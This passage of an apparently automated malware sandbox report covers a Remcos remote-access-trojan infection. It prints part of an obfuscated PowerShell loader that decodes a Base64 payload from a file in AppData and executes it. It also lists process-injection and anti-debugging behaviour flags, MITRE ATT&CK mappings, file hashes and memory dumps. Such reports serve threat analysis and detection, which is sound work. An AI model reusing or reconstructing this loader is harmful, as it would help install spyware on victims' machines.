HenniAstermTrinoiLavisnEngagi Rubi=Topal(Gri,fTRe neeTwifosNeotrtElsiz- ParaPArkanaCar it kuffhImpas Gran$ O skKVerifvBosc iSammevPluriaMedstl R,tieDamsen BiogtU.vale ArberNe co)Zymes ') ;Preapproval184 (Traverseringer 'Speak$RundhgSundhlStatioIn.utbst.lda An,el Indb:TyphoSInvesa Paasp Skra=Achil$Demo gdu nel Gra,o ska bAn tia feltl Mul.: arsoE Tegln FlowtNy ageHanderI effoCong,lLimbiiAevumtunderhTact.i orbaa .uirsHyperiUnequsOver +Bikag+ Sw,n%Reave$ rejnBMikror kftedOutbufPo ntd trll.UafvicK.gedosilviuAutornKa.iat Redb ') ;$Helbredelser=$Brdfd[$Sap];}$Effluent=328183;$Tilendebringende141=30662;Preapproval184 (Traverseringer 'Kisse$In urgInfi lReroyoS ranbAer sa A.telUnree:AndroUIdentdObtaivBrackitiltakPosi lFel fiImdekn S orgCholesPennaoUrsicmMill.kWhi woNedsksRinaltspanknAblatiTildenIngelgCannoeFattirFj re Coryl= aand AotesGAcroge expltR bbl- rillCforfaoRe imn Sys tBilleeUntarnTthedtforva ,rter$Vict.KHushovChintiSyendvDesubaColoul ExceeZym ln IntetGesxeeCentrr Vold ');Preapproval184 (Traverseringer 'Nonar$UtydegteleflSaltko HellbCons a Actal lbes: uforAAnalymyd.eltRidessCoriogMateraatr crR turaInst n Str.tBes ti Mano Haabe=Brier Krymm[measuSWo anyshifts ud,tt Opsae ,imimUltra.LianeCSaddloUbesknIndenv Aftee RaasrAchrotHamal]Regne:H ael:St,idF ingarOctupoBrnd,mButtoBExaggaCu drsRealie kort6Nonst4ForpaSRetspt.ardirAngreiAktien Hal gPic i( pr e$NotedU,krvldStrokvFiskei dssyk etall,ubliiAflusnprejugGolfes WhipoEmp,rmIm.erkredouoTyskesDismatRecoin DipliByggenHyphog HjlpeHaa drSlagt)Matut ');Preapproval184 (Traverseringer 'Stemm$FuglegReflel ouchop ismbreduxa Mylolvrkst:GraftK DioprUnderaMaranbTyvennForudiNaadlnArdufg,rila Ruina=Roets Newfo[ Fil,SFredyydeputsLindstSnorkeFdselmGraes.cooinT ,onne In exTunnetAmar,.DelegE EparnValuec DysfoUnfaddSuperiAfhudnFastlgOptim]temp.: Delt:Phy,oA,uttuSAllegC recrIOvercI adel.FoderGUnisteShellt trimSDest tFrkenrFatteiScle,nHeroigLuann(Afmar$Un ppAExpedm SkrktH,pnosSignagB nebaBianirE thra Afren UnextTi.loiL apf)icono ');Preapproval184 (Traverseringer 'Be ys$ Kil gIntenl Sub oVartebFarefasynstl Inst:RialtSfangskTail rTendeu omnieju tar Laci=Hoved$TessuKA grurPhoreaBoultbAerognUnderi AnarnShoolgCcid . alors sakruAtombbPristsTr pet SemirBlgedica.ulnForbrgHomer( Line$RoyceESvrdffRobo fDj ell SticuEuo meWositn KructAs.or,Slags$TjernTIonisiReadvl AegaeOvervn ,oetdOuttyeOpre.bTilvkr askihochhn LiqugSdssueintron Sk.ldUnbleehftn 1E.skl4 Ophi1dosim)Flage ');Preapproval184 $Skruer;"
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2608
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Favne.For && echo t"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1060
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:1384

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
6ebcd3f8774974ffa014c6fba46fac40

SHA1
c700679c609e0cd5b692437e9b1f17d2026a8442

SHA256
0b11bfe9c1fea28883c391e52478cab3a1cda4b32bf25f353204d50f90cf5b90

SHA512
c1441cf416cd08a73afc5a5da2114e07183581247ac8d0f001eb7dd281b02ce6471be0497d1f27032f14ebdb7be264e8e4d1098018aa5a9db913408996071b3b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
5b31402c8edc7729e3b1df84b3f13de6

SHA1
0314b9aa05c41faaf6a99e9f097398a0c32a389e

SHA256
a86172b02d769f3169fe762deb210032b89ac8aec5c85558b5ef2412c2711d22

SHA512
047e424c4009d87e97b59b143d1a40d900a1b013976c7bc79d1fb69eb58c83ecaf00b4a63bb9018601e39c6665b8e6b8b9a086bc5f9809d2bb9e976d05aa2111

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabFDF0.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar7E55.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\Favne.For

Filesize
467KB

MD5
984551d358934fa2b7f6c2bc4891b21a

SHA1
03e5155ad907e0c4d790bb6bdbbc147f06efb48f

SHA256
98c04389ddb9a5f913a1df69638a1d23dbd9185a2a33c46fbfc87184f020a5ec

SHA512
979c8fef38611637501e034cc83d5605d8de3f1260d078bf2eb59e891b062a039dfecbc0578d993c8e86f6c942d32816ced40255c98cdc9895b5e48dba03784a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1A63G0L7L7T8ZYVAE87Z.temp

Filesize
7KB

MD5
e138b54a5f73422ca99dbed23a53c836

SHA1
31aa79a36b4fc8ae599c4732ab91a86bfeb03594

SHA256
5855c0fc429eca23bd0defc6da48627fff56cd58734624d0aa5910da6f78934b

SHA512
2561dc49b05a0e2c12ff26a6c32eaaf69990a6f22a17b93bab09e154d40231293d7c927055cc11d7850e60636e3daa9a65de97b6772ea89d4655284adf512d87

Download Submit
memory/1384-61-0x00000000016D0000-0x0000000002D84000-memory.dmp

Filesize
22.7MB

Download
memory/1384-60-0x0000000000660000-0x00000000016C2000-memory.dmp

Filesize
16.4MB

Download
memory/1384-36-0x00000000016D0000-0x0000000002D84000-memory.dmp

Filesize
22.7MB

Download
memory/2108-24-0x000007FEF5860000-0x000007FEF61FD000-memory.dmp

Filesize
9.6MB

Download
memory/2108-32-0x000007FEF5B1E000-0x000007FEF5B1F000-memory.dmp

Filesize
4KB

Download
memory/2108-28-0x000007FEF5860000-0x000007FEF61FD000-memory.dmp

Filesize
9.6MB

Download
memory/2108-34-0x000007FEF5860000-0x000007FEF61FD000-memory.dmp

Filesize
9.6MB

Download
memory/2108-26-0x000007FEF5860000-0x000007FEF61FD000-memory.dmp

Filesize
9.6MB

Download
memory/2108-25-0x000007FEF5860000-0x000007FEF61FD000-memory.dmp

Filesize
9.6MB

Download
memory/2108-23-0x000007FEF5860000-0x000007FEF61FD000-memory.dmp

Filesize
9.6MB

Download
memory/2108-22-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download
memory/2108-21-0x000000001B700000-0x000000001B9E2000-memory.dmp

Filesize
2.9MB

Download
memory/2108-62-0x000007FEF5860000-0x000007FEF61FD000-memory.dmp

Filesize
9.6MB

Download
memory/2108-20-0x000007FEF5B1E000-0x000007FEF5B1F000-memory.dmp

Filesize
4KB

Download
memory/2608-35-0x00000000066C0000-0x0000000007D74000-memory.dmp

Filesize
22.7MB

Download

Analysis

Sharing